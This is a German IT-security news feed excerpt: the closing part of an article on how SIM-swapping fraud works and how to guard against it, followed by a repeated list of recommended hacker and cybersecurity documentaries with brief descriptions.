<p>In beiden Fällen genügt natürlich nicht nur die Angabe der Mobilfunknummer; der Hacker muss zusätzliche persönliche Informationen des Opfers bereitstellen, wie Geburtsdatum, Adresse oder Kundenkennwort – Daten, die er sich etwa in sozialen Netzwerken beschafft (<a href="https://www.computerwoche.de/article/2780856/social-engineering-angriffe-erkennen-und-verhindern.html" title="Social Engineering" target="_blank">Social Engineering</a>), via Phishing-Mails erhalten oder im Darknet gekauft hat. Bei einem Anruf im Servicecenter des Mobilfunkanbieters können mit etwas Überredungsgeschick schon leichter zugängliche Daten ausreichen, damit der Mitarbeiter dem Änderungswunsch trotz mangelnder Legitimation nachzukommt.</p>



<p>Im Anschluss muss sich der Angreifer bei herkömmlichen SIM-Karten noch die physische SIM beschaffen, etwa, indem er den Brief des Mobilfunkanbieters abfängt oder eine andere Adresse angibt. Einfacher geht dies mit einer <a title="eSIM" href="https://www.computerwoche.de/article/2793665/die-neue-sim-karte-das-sollten-sie-wissen.html" target="_blank">eSIM</a>, die inzwischen viele Smartphones unterstützen: Hier wird der eingebaute Chip auf elektronischen Weg mit dem eSIM-Profil beschrieben.</p>



<h3 class="wp-block-heading">Wurde Ihre Mobilfunknummer gestohlen?</h3>



<p>Sind SMS-Versand, Handy-Telefonate und mobile Datenverbindungen auf einmal nicht mehr möglich, kann dies ein Indiz dafür sein, dass die Rufnummer möglicherweise den Besitzer wechselte. Wahrscheinlicher ist allerdings, dass man sich lediglich in einem Funkloch befindet oder einer technischen Störung des Mobilfunknetzes vorliegt. </p>



<p>Eindeutiger ist es, wenn man plötzlich nicht mehr auf verschiedene Dienste zugreifen kann oder ungewöhnliche Vorgänge auf seinem Konto registriert. Da viele Angreifer nachtaktiv sind, merkt man die Probleme häufig erst am nächsten Morgen – dann ist es allerdings in der Regel bereits zu spät. </p>



<p>Haben Sie den Verdacht, Opfer von SIM-Swapping geworden zu sein, sollten Sie schnell handeln: Kontaktieren Sie umgehend über einen anderen Anschluss Ihren Mobilfunkanbieter. Lassen Sie die SIM-Karte sperren und melden Sie den Betrug.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<h3 class="wp-block-heading">Wie Sie sich vor SIM-Swapping schützen</h3>



<p>Beim Schutz vor SIM-Swapping gelten viele Tipps, die auch bei anderen Betrugsmaschen im Internet helfen:</p>



<ul class="wp-block-list">
<li><p>Nutzen Sie ein aktuelles Betriebssystem mit den neuesten Sicherheits-Updates und – wo es Sinn macht – Antivirensoftware.</p></li>



<li><p>Verwenden Sie kein einheitliches Passwort für verschiedene Online-Dienste, sondern jeweils einen individuellen Code, der zudem ausreichend lang und komplex ist.</p></li>



<li><p>Aktivieren Sie Zwei-Faktor-Authentifizierung als zusätzliche Komponente sicherer Passwörter.</p></li>



<li><p>Überprüfen Sie gelegentlich, ob es ein Datenleck bei einem der von Ihnen genutzten Dienste gab und Ihre Daten in falsche Hände gerieten. Hinweise dazu liefert etwa der <a title="Identity Leak Checker vom Hasso-Plattner-Institut " href="https://sec.hpi.de/ilc/search?lang=de" target="_blank" rel="noopener">Identity Leak Checker vom Hasso-Plattner-Institut </a>oder <a title="haveibeenpwned.com" href="https://haveibeenpwned.com/" target="_blank" rel="noopener">haveibeenpwned.com</a>.</p></li>



<li><p>Vorsicht vor Phishing-Mails: Seriöse Unternehmen, insbesondere Banken, fordern ihre Kunden niemals auf, persönliche Daten über eine Link in einer Mail preiszugeben.</p></li>
</ul>



<p>Auch die Mobilfunkbetreiber haben nach dem Aufkommen erster SIM-Swapping-Fälle in Deutschland Vorkehrungen getroffen. So bietet etwa die Telekom seit Sommer 2018 Identifikation per Stimme (Sprach-ID) an, bei Telekom, Vodafone und o2 ist ein spezielles Kundenkennwort bei der Kunden-Hotline verpflichtend. Nutzen Sie diese Möglichkeiten.</p>



<p>Empfehlenswert ist außerdem – soweit möglich – anstelle von SMS oder Anruf – eine andere Methode wie FaceID oder YubiKey – zur Zwei-Faktor-Authentifizierung zu wählen. </p>



<div class="foundryDgalleryWrapper" data-foundry-gallery-id="116686"><h3>Das Einmaleins der IT-Security</h3><p><strong>Adminrechte</strong><br>Keine Vergabe von Administratorenrechten an Mitarbeiter</p><p><strong>Dokumentation</strong><br>Vollständige und regelmäßige Dokumentation der IT</p><p><strong>Sichere Passwörter</strong><br>IT-Sicherheit beginnt mit Sensibilisierung und Schulung der Mitarbeiter sowie mit einer klaren Kommunikation der internen Verhaltensregeln zur Informationssicherheit:<br><br> Komplexe Passwörter aus Groß- und Kleinbuchstaben, Ziffern und Sonderzeichen, mindestens achtstellig.</p><p><strong>Passwortdiebstahl</strong><br>Niemals vertrauliche Daten weitergeben oder/und notieren.</p><p><strong>E-Mail-Sicherheit</strong><br>E-Mails signieren, sensible Daten verschlüsseln, Vorsicht beim Öffnen von E-Mail-Anlagen und Links.</p><p><strong>Soziale Manipulation</strong><br>Bewusst mit vertraulichen Informationen umgehen, nur an berechtigte Personen weitergeben, sich nicht manipulieren oder aushorchen lassen.</p><p><strong>Vorsicht beim Surfen im Internet</strong><br>Nicht jeder Link führt zum gewünschten Ergebnis.</p><p><strong>Nur aktuelle Software einsetzen</strong><br>Eine nicht aktualisierte Software lässt mehr Sicherheitslücken offen.</p><p><strong>Verwendung eigener Software</strong><br>Unternehmensvorgaben beachten und niemals Software fragwürdiger Herkunft installieren.</p><p><strong>Unternehmensvorgaben</strong><br>Nur erlaubte Daten, Software (Apps) und Anwendungen einsetzen.</p><p><strong>Backups</strong><br>Betriebliche Daten regelmäßig auf einem Netzlaufwerk speichern und Daten auf externen Datenträgern sichern.</p><p><strong>Diebstahlschutz</strong><br>Mobile Geräte und Datenträger vor Verlust schützen.</p><p><strong>Gerätezugriff</strong><br>Keine Weitergabe von Geräten an Dritte, mobile Geräte nicht unbeaufsichtigt lassen und Arbeitsplatz-PCs beim Verlassen sperren. </p><p><strong>Sicherheitsrichtlinien</strong><br>Die organisatorischen Strukturen im Hintergrund bilden den erforderlichen Rahmen der IT-Sicherheit. Hier gilt es, klare Regelungen zu formulieren und einzuhalten:<br><br>Definition und Kommunikation von Sicherheitsrichtlinien</p><p><strong>Zugriffsrechte</strong><br>Regelung der Zugriffsrechte auf sensible Daten</p><p><strong>Softwareupdates</strong><br>Automatische und regelmäßige Verteilung von Softwareupdates</p><p><strong>Logfiles</strong><br>Kontrolle der Logfiles</p><p><strong>Datensicherung</strong><br>Auslagerung der Datensicherung</p><p><strong>Sicherheitsanalyse</strong><br>Regelmäßige Überprüfung der Sicherheitsmaßnahmen durch interne und externe Sicherheitsanalysen</p><p><strong>Notfallplan</strong><br>Erstellung eines Notfallplans für die Reaktion auf Systemausfälle und Angriffe </p><p><strong>WLAN-Nutzung</strong><br>Auf technischer Ebene muss ein Mindeststandard gewährleistet sein. Dieser lässt sich größtenteils ohne großen Kostenaufwand realisieren:<br><br>Dokumentation der WLAN-Nutzung, auch durch Gäste</p><p><strong>Firewalls</strong><br>Absicherung der Internetverbindung durch Firewalls</p><p><strong>Biometrische Faktoren</strong><br>Einsatz von Zugangsschutz/Kennwörter/Biometrie</p><p><strong>Zugangskontrolle</strong><br>Physische Sicherung/Zugangskontrolle und -dokumentation</p><p><strong>Schutz vor Malware</strong><br>Schutz vor Schadsoftware sowohl am Endgerät als auch am Internetgateway, idealerweise durch zwei verschiedene Antivirenprogramme</p><p><strong>Webzugriffe</strong><br>Definition einer strukturierten Regelung der Webzugriffe</p><p><strong>Verschlüsselung</strong><br>Verschlüsselung zum Schutz von Dateien und Nachrichten mit sensiblen Inhalten</p><p><strong>Löschen</strong><br>Sicheres Löschen der Daten bei Außerbetriebnahme</p><p><strong>Update der Sicherheitssysteme</strong><br>Sicherstellung regelmäßiger Updates der Sicherheitssysteme</p><p><strong>Monitoring</strong><br>Permanente Überwachung des Netzwerkverkehrs auf Auffälligkeiten </p></div>

</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security-Infotainment: Die besten Hacker-Dokus]]></title>
<description><![CDATA[Sie fühlen sich leer ohne Security-Dashboard? Diese Dokumentationen überbrücken den Schmerz bis zum nächsten Arbeitstag.  Foto: Gorodenkoff – shutterstock.com




Wenn Sie in Ihrer Profession als Sicherheitsentscheider voll aufgehen, brauchen Sie möglicherweise auch zwischen den Arbeitstagen ihre...]]></description>
<link>https://tsecurity.de/de/3529713/it-security-nachrichten/security-infotainment-die-besten-hacker-dokus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529713/it-security-nachrichten/security-infotainment-die-besten-hacker-dokus/</guid>
<pubDate>Tue, 19 May 2026 17:39:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img decoding="async" alt="Sie fühlen sich leer ohne Security-Dashboard? Diese Dokumentationen überbrücken den Schmerz bis zum nächsten Arbeitstag. " title="Sie fühlen sich leer ohne Security-Dashboard? Diese Dokumentationen überbrücken den Schmerz bis zum nächsten Arbeitstag. " src="https://images.computerwoche.de/bdb/3357623/1200x.jpg" width="1200" loading="lazy"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Sie fühlen sich leer ohne Security-Dashboard? Diese Dokumentationen überbrücken den Schmerz bis zum nächsten Arbeitstag. </p></figcaption></figure><p class="imageCredit"> Foto: Gorodenkoff – shutterstock.com</p></div>




<p>Wenn Sie in Ihrer Profession als Sicherheitsentscheider voll aufgehen, brauchen Sie möglicherweise auch zwischen den Arbeitstagen ihre tägliche Dosis Cybersecurity. Falls Ihnen die <a href="https://www.csoonline.com/article/3495593/security-entertainment-die-besten-hacker-filme.html" title="zahlreichen Annäherungen Hollywoods an das Thema" target="_blank">zahlreichen Annäherungen Hollywoods an das Thema</a> viel zu weit von der Realität entfernt sind, können Sie auf ein Füllhorn hochwertiger Dokumentationen zurückgreifen. Die sind nicht nur informativ, (meist) sehr nah an der Realität und unterhaltsam, sondern teilweise auch historisch wertvoll und in einigen Fällen kostenlos in voller Länge verfügbar. </p>



<h2 class="wp-block-heading">Doku-Highlights für Sicherheitsentscheider</h2>



<p>Nachfolgend haben wir diverse sehenswerte Dokumentationen in Zusammenhang mit Cybersecurity und Hacker-Kultur für Sie zusammengestellt. Viel Spaß!</p>



<p><strong>Hackers – Wizards of the Electronic Age (1985)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>frühe Doku über die Hacker Community</p></li>



<li><p>unter anderem mit Steve Wozniak</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Hackers in Wonderland (2000)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>porträtiert UK- und US-Hacker</p></li>



<li><p>beleuchtet Hacktivismus</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Secret History of Hacking (2001)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>fokussiert frühe Hacking-Techniken</p></li>



<li><p>mit John Draper, Steve Wozniak und Kevin Mitnick</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Hackers Are People Too (2008)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>von Hackern kreiert</p></li>



<li><p>will mit Stereotypen aufräumen</p></li>



<li><p>beleuchtet auch die Rolle der Frauen in der Community</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>We Are Legion: The Story of the Hacktivists (2012)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>beleuchtet das Hacker-Kollektiv Anonymous</p></li>



<li><p>zahlreiche O-Töne von Mitgliedern und Experten</p></li>



<li><p>auf diversen Filmfestivals ausgezeichnet</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>DEFCON: The Documentary (2013)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>stellt das 20-jährige Jubiläum der Hacking-Konferenz DEFCON in den Fokus</p></li>



<li><p>bis zu dieser Doku herrschte auf der Konferenz striktes Kameraverbot</p></li>



<li><p>O-Töne von Teilnehmern und Verantwortlichen</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Citizenfour (2014)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert Edward Snowden und den NSA-Skandal</p></li>



<li><p>enthält Interviews mit Snowden aus dem Jahr 2013</p></li>



<li><p>entstand unter Beteiligung von Glenn Greenwald</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Digital Amnesia (2014)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>wirft ein Schlaglicht auf digitale Daten und den Umgang mit diesen</p></li>



<li><p>mit Beteiligung von Experten des Internet Archive</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Deep Web (2015)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert den Darknet-Marktplatz Silk Road</p></li>



<li><p>beleuchtet dabei auch die Verhaftung und den Prozess von Gründer Ross Ulbricht</p></li>



<li><p>O-Töne von zahlreichen Beteiligten</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>A Good American (2015)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Geschichte des Ex-NSA-Direktors Bill Binney</p></li>



<li><p>klärt auf, wie ein Computerprogramm 9/11 hätte verhindern können</p></li>



<li><p>Regie führte der Österreicher Friedrich Moser</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>War for the Web (2015)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>wirft einen Blick auf die physische Infrastruktur hinter dem Internet</p></li>



<li><p>zeigt, wie Unternehmen und Regierungen hinter den Kulissen um die Vorherrschaft kämpfen</p></li>



<li><p>beleuchtet dabei auch Fragen wie Data Ownership, Datenschutz und Security</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Cyber War (2016)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>zeigt, wie Regierungen im Kampf gegen kriminelle Hacker aufrüsten</p></li>



<li><p>dabei kommen auch unlautere Mittel wie Spionage zur Sprache</p></li>



<li><p>viele prominente O-Töne</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Down the Deep Dark Web (2016)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>bietet Insider-Einblicke in das Darknet</p></li>



<li><p>beleuchtet dabei auch legitime Einsatzzwecke</p></li>



<li><p>will mit Vorurteilen und Stereotypen aufräumen</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Zero Days (2016)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Geschichte des Stuxnet-Virus</p></li>



<li><p>analysiert ausgiebig die Folgen des Angriffs</p></li>



<li><p>bietet zahlreiche Insider-Einblicke und O-Töne</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Facebook: Cracking the Code (2017)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>beleuchtet die Security-Kultur und -Probleme bei Facebook</p></li>



<li><p>geht dabei auch auf die Nutzung von User-Daten, Ad-Gebahren und Fake News ein</p></li>



<li><p>zahlreiche O-Töne von Experten</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Kim Dotcom: Caught in the Web (2017)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Geschichte von Megaupload-Gründer Kim Schmitz</p></li>



<li><p>beleuchtet dabei seinen Kampf gegen die US-Regierung und die Entertainment-Branche</p></li>



<li><p>zahlreiche O-Töne von Beteiligten – auch Kim selbst</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>The Defenders (2018)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>analysiert vier schlagzeilenträchtige Cyberattacken</p></li>



<li><p>nimmt dabei die Perspektive der Verteidiger ein</p></li>



<li><p>produziert vom Sicherheitsanbieter Cybereason</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>The Great Hack (2019)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert den Skandal um Facebook und Cambridge Analytica</p></li>



<li><p>nimmt dabei die Perspektive verschiedener Beteiligter auf</p></li>



<li><p>aufwändig produziert</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>HAK_MTL (2019)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>kanadische Hacker stellen die Datenschutz-Versprechen von Unternehmen auf die Probe</p></li>



<li><p>dabei liegt ein Fokus auf Überwachungstechnologien</p></li>



<li><p>interessante Insider-Einblicke und O-Töne</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>WannaCry: The Marcus Hutchins Story (2019)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Geschichte des IT-Experten, der WannaCry durch Zufall stoppte</p></li>



<li><p>und anschließend in Zusammenhang mit einem Banking-Trojaner verhaftet wurde</p></li>



<li><p>dabei kommt auch Hutchins selbst zu Wort</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>KnowBe4: The Making of a Unicorn (2020)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>erzählt die Gründungsgeschichte des Security-Unternehmens KnowBe4</p></li>



<li><p>mit Beteiligung von Chief Hacking Officer Kevin Mitnick</p></li>



<li><p>produziert vom Cybercrime Magazine</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>MY.DOOM: Earth’s Deadliest Computer Viruses (2021)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert den Computervirus MyDoom aus dem Jahr 2004</p></li>



<li><p>analysiert dabei auch seine Auswirkungen</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Biggest Heist Ever – Der große Bitcoin-Raub (2024)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert den Hackerangriff auf die Hong Konger Kryptobörse Bitfinex aus dem Jahr 2016</p></li>



<li><p>beleuchtet den Werdegang von Ilya Lichtenstein und Heather Morgan, die für den Angriff verurteilt wurden</p></li>



<li><p>diverse O-Töne von Ermittlern, Freunden, Betroffenen – und auch von Ilya Lichtenstein selbst </p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Most Wanted: Teen Hacker (2025)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li>beleuchtet die Cybercrime-Karriere des finnischen Hackers Julius Kivimäki</li>



<li>enthält Interviews mit Strafverfolgungsbehörden und Opfern des Cyberkriminellen</li>



<li>auch Kivimäki selbst kommt zu Wort</li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Joybubbles (2026)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li>erzählt die Geschichte des blinden Telefonhackers Joe Engressia aus dessen eigener Perspektive</li>



<li>ursprünglich als <a href="https://www.kickstarter.com/projects/rachaelmorrison/joybubbles-the-documentary-film" target="_blank" rel="noreferrer noopener">Kickstarter-Projekt</a> gestartet</li>



<li>erfolgreiche Premiere auf dem <a href="https://festival.sundance.org/program/film/6932fad21a5535277891b127" target="_blank" rel="noreferrer noopener">Sundance Film Festival 2026</a></li>
</ul>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security-Infotainment: Die besten Hacker-Dokus]]></title>
<description><![CDATA[Sie fühlen sich leer ohne Security-Dashboard? Diese Dokumentationen überbrücken den Schmerz bis zum nächsten Arbeitstag.  Foto: Gorodenkoff – shutterstock.comWenn Sie in Ihrer Profession als Sicherheitsentscheider voll aufgehen, brauchen Sie möglicherweise auch zwischen den Arbeitstagen ihre tägl...]]></description>
<link>https://tsecurity.de/de/3527749/it-security-nachrichten/security-infotainment-die-besten-hacker-dokus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527749/it-security-nachrichten/security-infotainment-die-besten-hacker-dokus/</guid>
<pubDate>Tue, 19 May 2026 05:52:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img decoding="async" alt="Sie fühlen sich leer ohne Security-Dashboard? Diese Dokumentationen überbrücken den Schmerz bis zum nächsten Arbeitstag. " title="Sie fühlen sich leer ohne Security-Dashboard? Diese Dokumentationen überbrücken den Schmerz bis zum nächsten Arbeitstag. " src="https://images.computerwoche.de/bdb/3357623/1200x.jpg" width="1200" loading="lazy"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Sie fühlen sich leer ohne Security-Dashboard? Diese Dokumentationen überbrücken den Schmerz bis zum nächsten Arbeitstag. </p></figcaption></figure><p class="imageCredit"> Foto: Gorodenkoff – shutterstock.com</p></div><p>Wenn Sie in Ihrer Profession als Sicherheitsentscheider voll aufgehen, brauchen Sie möglicherweise auch zwischen den Arbeitstagen ihre tägliche Dosis Cybersecurity. Falls Ihnen die <a href="https://www.csoonline.com/article/3495593/security-entertainment-die-besten-hacker-filme.html" title="zahlreichen Annäherungen Hollywoods an das Thema" target="_blank">zahlreichen Annäherungen Hollywoods an das Thema</a> viel zu weit von der Realität entfernt sind, können Sie auf ein Füllhorn hochwertiger Dokumentationen zurückgreifen. Die sind nicht nur informativ, (meist) sehr nah an der Realität und unterhaltsam, sondern teilweise auch historisch wertvoll und in einigen Fällen kostenlos in voller Länge verfügbar. </p>



<h2 class="wp-block-heading">Doku-Highlights für Sicherheitsentscheider</h2>



<p>Nachfolgend haben wir diverse sehenswerte Dokumentationen in Zusammenhang mit Cybersecurity und Hacker-Kultur für Sie zusammengestellt. Viel Spaß!</p>



<p><strong>Hackers – Wizards of the Electronic Age (1985)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>frühe Doku über die Hacker Community</p></li>



<li><p>unter anderem mit Steve Wozniak</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Hackers in Wonderland (2000)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>porträtiert UK- und US-Hacker</p></li>



<li><p>beleuchtet Hacktivismus</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Secret History of Hacking (2001)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>fokussiert frühe Hacking-Techniken</p></li>



<li><p>mit John Draper, Steve Wozniak und Kevin Mitnick</p></li>



<li><p>kostenlos in voller Länge verfügbar</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Hackers Are People Too (2008)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>von Hackern kreiert</p></li>



<li><p>will mit Stereotypen aufräumen</p></li>



<li><p>beleuchtet auch die Rolle der Frauen in der Community</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>We Are Legion: The Story of the Hacktivists (2012)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>beleuchtet das Hacker-Kollektiv Anonymous</p></li>



<li><p>zahlreiche O-Töne von Mitgliedern und Experten</p></li>



<li><p>auf diversen Filmfestivals ausgezeichnet</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>DEFCON: The Documentary (2013)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>stellt das 20-jährige Jubiläum der Hacking-Konferenz DEFCON in den Fokus</p></li>



<li><p>bis zu dieser Doku herrschte auf der Konferenz striktes Kameraverbot</p></li>



<li><p>O-Töne von Teilnehmern und Verantwortlichen</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Citizenfour (2014)</strong></p>



<p>Kurz und knapp:</p>



<ul class="wp-block-list">
<li><p>thematisiert Edward Snowden und den NSA-Skandal</p></li>



<li><p>enthält Interviews mit Snowden aus dem Jahr 2013</p></li>



<li><p>entstand unter Beteiligung von Glenn Greenwald</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

